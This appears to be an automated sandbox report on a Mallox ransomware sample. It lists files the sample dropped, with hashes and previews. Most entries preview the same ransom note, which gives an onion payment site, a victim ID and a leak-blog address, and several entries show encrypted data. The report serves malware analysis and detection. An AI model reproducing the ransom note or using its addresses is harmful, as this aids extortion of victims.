                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\Color\Profiles\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Adobe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\CEF\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\CEF\User Data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Comms\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3145836
                        Entropy (8bit):4.7005398593992505
                        Encrypted:false
                        SSDEEP:12288:PLFns6dGTHeLt25hQwTUjMMjrtttttttttttttttttttttttttttttttttttttto:j/dG0t25O2IrE
                        MD5:BF10B131C5AD4F4989444540C45A335C
                        SHA1:5DF60A36D062DCDFFBD33C37837E39A6E4836DC5
                        SHA-256:65ED6A976748CF6470994A5D6CBFCC17532CA6215589C6ED3FA17693D6B7FCED
                        SHA-512:BE5F87BCCDF467BE61113EF372E7E6709F18CEFD298B9FEFCF73A7537BAF797622499E6E968608197EC92572C49033A6004927D61F49C544A501E6425648AC6B
                        Malicious:false
                        Preview:......1z....4Y..Cy.w...r^.:^.....x ;x..[#.jG(#.......Ey. #A.`.1.....R.Cw. ....+....\......qz..Q...G.*p.._y-..^@..v~Z.\.i.U.E....S.`b...}.n.TU.4J.nZ..x7...-...K)....)l..[.j]../&3knp.......j...D..9..t...6q.i.....k.kBo.....?G. t.1!v.f..9+e....u.].k.S..3.K.....g...R.tY%.,:.......R.K...~r....b_8!.e..we.......7.......Z&o7..w=...j...{.X..z...h.U0...oE+..&v..A0.Z.....a...=.~2.K.p.^.jz.d.............}...'Z..ic.q\.c...f.D/.(...,.,.....^[.>.~.p..hI.\..}.z..n..8.j...5......k).....|..gO...Uj.....e..Q.+sR.,NZ.|~.%..[VG.vp.;q..$..8Pf.+."....;.{M.gi...........}6z.\"T.~K..^..Bx.V.....!.G............E[.ngE.l....sz..9...Y=..j.....Y......YD....Q.'K_....O0,.0.k..z..J...'..*..../bj....dm>..8..[..T7..fI(X.X>.........p.4..K#.O..(.^.....V....8...u.Ge`..}...50.^P7..~a.O..S...$..O..j4.q......E@5....I.....A.......S...g..D..x...6..i.I2.>X........g...lU.....1.Dm..V....wy.C....!v.y].LG....?l.....\...t..!..K....... .tV...9.CF..ln6..l'.7Q.1\.b.,..v0\h;b4..C..].`.

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3145836
                        Entropy (8bit):4.067170915659604
                        Encrypted:false
                        SSDEEP:6144:nSySySySySySySySySySySySySySySySySySySySySySySySySySySySySySySyn:j
                        MD5:84072EDA5A6668E7FEC02675F47CE099
                        SHA1:0296899A8C999B206450E86AA2C7D8CB6C8C014A
                        SHA-256:BE519F5B1D7AF5A1AB750E2922CF57166AB8C3F2FE12A7D4959A7057C258D5EE
                        SHA-512:BCC32420CA416DE190A789F9A73C3F98A772B96D4F7D947A4D66A0AA4B63576AA1435F7F5C2A574470D5DD5BC6016B4E4E1995A30CC7C68CD496F9DEF8F3895B
                        Malicious:false
                        Preview:X...G..e.Nvf..<.@...s[U...U/.+aI\...JY....".K]....w..N..3b.I.X.Xg.j...ya.{$p....3..G.B.0....<.a....+.a...j."`........K.$a..;Q..../.R....W"H..C&..'$...O9R....?.....R..d9............/G...].&V.H..I.m.@..Sl.^T:.M.3N3o.....x..?..l...or...1.......L.ps.X.U..(.G....!.q..k9j...7...K..).L?......e....%g.....g.O.._..q.C_.!..'.......0$..Ov.|..a.C.Z..V.._\y...Yc.....9.W.i_Zo&..9E...,...T.K....iRY...:Q...#.Y.X..k..r.=.b...F..0..qYk..w..Ax]?.t.Q....B..#..."K.P.o#.G.,..!....'..|.u......w..<.W,Z0..Q..4"...!..f.r..~PM....tS.v6.................l..&..-E.S..L..sQv+..{.+.-I.....#0...L....w.[.i....0..7.9..A..z.>....mS..x6..udadn~./.$..&a..@.-..p.@.I.O.v..C..;......._..Z....\...[.l.njB.j..C.m-.A...?.. 7~.{....W....|. .\!.....v(.O%...s+AT.e.....i...*.Ss.....d....-.....y.Y_P.c.. y..xnZ.\`...(7<m.;.(....,..$4M..F.R....hj...#O..".G...h.[n.u.}....3.5z. ...iV.\.%...\.Rd.Q..:l.,...p[.@,.^.n.p,J8.}.....u[.z.9.7`bW.N. ....~.5b.36..T.._5..C.;=..U.oG...1ok..:..t.2..h,k.#.

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3145836
                        Entropy (8bit):4.0705722500844885
                        Encrypted:false
                        SSDEEP:98304:Tvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvh:Tvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvh
                        MD5:EB8358921F8F9E8A9EDFAB10F3273517
                        SHA1:E19262DB2A0EF10B608EF3B0D9BA669C8D4D475F
                        SHA-256:F7A9E8CF85618ABF8CF333634A3100DD1277D8CFDA383B99476BE01880F2FE10
                        SHA-512:E88D3C8E17B9C80E665665B78FF6812B0DEB2F6C10FE454314EE598DAA26B268EFF44C61FB98130A5B022638ECF3642C65733EEAF17EFE9EEF680460914AC977
                        Malicious:false
                        Preview:...w..$7'.8......e.v..L..M.Vj<..T.a......nk.*7Np._..N %.@..p__X.MW....R1eho...o.#|R?.a..=.B$...37nW..Y./.<\...b.m..3..{"^Vc..O...07.C.1Q,..........E.FI...o..Y..<....29A...}n<D+.s.i..'b...v..^dM.;R>{.......A....,....#6K.7/.......j...q.(....Id..^..I.%...US]E......|v.~.pn.W....>#.{D..e..I.....L..`:./....P....*.C^[......o.X..49.*.....!...{..'...\.....0..__.M...e.....~1....-^.A{.....\.b.....,.}..V....C.(*.......q.@.+O..7..j.^...|.9.....r.....t...mD.j,.g0.a...|y)...7k...y.....=<...<.@.].*..B.....C.Q.0Q.b..:.a.%....a.|...B.f^.\.=CtN7....z+.qX.a..@.?p...n...Q-.ls...w.k..".-z....!..G(B.i......^Fws.j...w.x......_n....;K_..4...|4]Kn{$....`D'.b@.o}....G..;...D..j.R..b.#.:(....3...D.Kt.....l*....K.q.uq....P.#........c.]U{.....j.w..E...+.y....q.....R.#.Ql..|f.^..W..7h........3..O..Sm"I....,"....l.....0._..t..p....+Pg.^.s=JXn.q....R..D8...x]...#m...e.f..%JD\Q.v.....$X4...h..B.^.h.e..9.9W$NWq..".?D.....K.....#.L..<.;...*...O.j.a..[..../.!.h[0......_.;Z.d...!..

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3145836
                        Entropy (8bit):4.065616341965276
                        Encrypted:false
                        SSDEEP:24576:1//////////////////////////////////////////////////////////////U:C
                        MD5:E7EC90ED496368271848FDB33AE3FBA6
                        SHA1:42791523D2A321A47737B5045B79459843F35224
                        SHA-256:985F6121113ACC9CEF8EC4199C8507EAA5011DEB222D7424930534A32F710477
                        SHA-512:7D9DFFE3663566B0DF42A309BE40BD603FE0F956A9E3512C759FE90C9DEF882707B8F1B5696F738C62398553EE62531A1D181C5D227273AE6FA0B48F1EC2E606
                        Malicious:false
                        Preview:a:...f...-....A|...)....i..."#...z..h..0..5g.^t.k,.S.....{;.....r....@._.J.G.M..|........i..;.-S..~..+.......v....h....;.6.x..+4.C.~Q...~5..[.m.e3p.P..U.['..W.v.......1..tvsu&I.c)Oe.Q......<..._...RE.Eq].....p.cm'=,JB...j....Z....#..*....6.....?6.v..BDX%...iucoB..A....J.M.k.Ei..K..V......1[...&..e..H@U..U.d..;..kW.8..+...e..!..1..>...a...'........sV[.{r..]..l.#.&.,.5.>.YP......[.....(%9y. ..fa .v.G....q....s..3..B.....J....y..a$dGI.Z........H.N..}....+...lS.............f....I........~:...X.?n...%+.al.u.x.F..~...9.j...Wf+..=..Jrx....Z....%.........k..-......i.?.Px=....]>.u...2.....j..Y..].."..B.P7..Fy...O..v+A.E.t%..(...|.D>}.#X.". .T."n......8.jD..mD..y.^....'..b.E..pE....G...9..).... m&....MP ...S.....IZ.x.GCn%a:.....lc.A"..p.x..B...{L9..K+Vk...[f;."......G..Jmj..C..-... ...lh|.. h.E..f/vf.B3......G...y.g.1E......F....S..uG..2..dG..IQ.`F.....`.....c/......@..]... n1.<.a.............e.......$&...1$.a.-....S.g.=..5`.....

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.98758123521394
                        Encrypted:false
                        SSDEEP:384:HiYn9dL5V1YtB9MSVai2LU7x8xKUYqcFbWXmeGXuyDIRamf:T9dFVCtB97QHxqTof0uyDIRai
                        MD5:07390628DEAF94186881DF0EF4DAFB1A
                        SHA1:E993D9CA58232B6FD8CEC5B68963B1EF6DED14B5
                        SHA-256:FBA1DD2DA5F493236CABB89197DD0139877132E9D2A43FE3D061B2EC799301EB
                        SHA-512:4FE7B63B703456AB4A1CACDC4FA020C16CE2A815E85739B01F27DAC44825A0A271E254C89FE7B5F57D1A7D49FD9D975BEAF37F2436C585B22DEA7FD431D6FE6D
                        Malicious:false
                        Preview:.V...\n..~........Q]...nH..'....JR....l....u.w........xb.......|..'.Y..Bup.m....."a..*+.O.e..%...4Y5.UJi...e.kS..H;.$.C.o?F}.(..T.h.r.g.D...*........N.^..Hs7..h..9.....j..uJ.....|b..~..<.$.J.+p..7....C.N.......5.O.~..q..<..y..so.Ox-.k....^...M..GQ[...]J.n1.;......V.`j.L..R.....Va.....>...4.w............y{..g.e......I_...1....L..~}...zK.H.9..U..QP./y#...J.........Q.M.h....I7....t..k].d..N@...Fm.,...x..._?gBwo.?......8S.&.7.{..&9.....Q...#.h7..g.A..{8..n..D 1..@%.0...^.L.h.9.....x..x...-..#S1...H..}4;..S8.....@U..1.....z#...-.Z..m..d.......4..s.j......].%=..3...B7.........F..tN.U..T{fR;...c.D.If.}.#@.HN.kq!Z./{...0...[.....p4..c.'X..h..m..P._):q..6.i<..f.s...y.6N..h.Lu*>......t..5.#...d...q.a.;.A:...L*......qb.#.m....".m...2.....L.?.=,.p..;...G.^./i.....p.ShS.mgs<.K\.F[._ S..Nr....n.`...<.zw.........Q.d=}....3X..\..w}&...0r.d...2..fs'k1.d.Y.]-.!.x..L....w....VXOf.^......mm.%B/a.._4dh..."...^.&.:.~/].6..2..N..N;:.....-t.....O.......]...p..o

                        C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5767276
                        Entropy (8bit):3.965523926862612
                        Encrypted:false
                        SSDEEP:49152:uYDMDdBFV1vWLnaxevPM9K4hmCnYKr1tqdme2O4txgTThbXDEkSpr7d6JPufsCFT:Kp
                        MD5:207A730C354C8B53816784F969486976
                        SHA1:22E27D64813059F01964DB7BFE64BB58C6A5B642
                        SHA-256:BE88A15982A7965D0FACFED1B4B11A12FF73A80694251D16501ED1C31A80C16E
                        SHA-512:792C28ACDF01C44D6BE859E045ACDC0CB6AAAA6CA0C7BB9341948D117D14DB8ACB5DC8F9E1DD4DE9577ED62DAD0186B293EF165155DE0E8E5B3AB2C024F3666C
                        Malicious:false
                        Preview:.....b.b....VF......9..yA...y..jL"...TxU1.BX...9^8@..$...E./...........?O.......mF.)$....~.;R.J..#......*0Uw.m........'.k..`5..Y.s..<......X..g.?..h.s...X'+87....E..q.J,.#....At.l.d6.OO&...s._.9.N..c..(....w m#e.Z.N-..,.ft..f.r.l1....&z.t.Rl.....@F<.?.V...*..E.B.....V...?Q..&<>....~....3..i.g.CT..$.a.......Owu6...s.....Qu....~....a........\...wr./..P...`.ab...U.q{.r3}..nL.....p.F....*.B.9.........L.+U.^.cn!>.......'.a.....ed?..k....6..Rc|..8F1l.y.:O.z..J@p.....E.B.q."....E=s9.........m/"CrZ.G.....F..<..$K....;..6=S....5...B....cK.H.....gVa...}..i3.h..pO..g.fC\}e.....RV.8Q..ew.*.a.dW.....\........j..@..I..I.t.....8..3..!Z.g..........,d.....-.aV..T.`.g..-......Q...#......w..>.w.!..2.8......u..#...i{B.>.'.....D.y..A.D".UO.....i..cr..oq....IE3yZA.E.A.......y....HdY.Y*....\H...;.&..6..T......=1..8X.E.............`....bj.+.l..,.....vUZ<z........?.....h,kPOR..G.h.+......2.=.....P..H..s..Pl<..C+...a.m.XkvQ%......r..EQ.(......z.~;va.li.*........

                        C:\Users\user\AppData\Local\Comms\Unistore\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Comms\Unistore\data\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\ConnectedDevicesPlatform\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
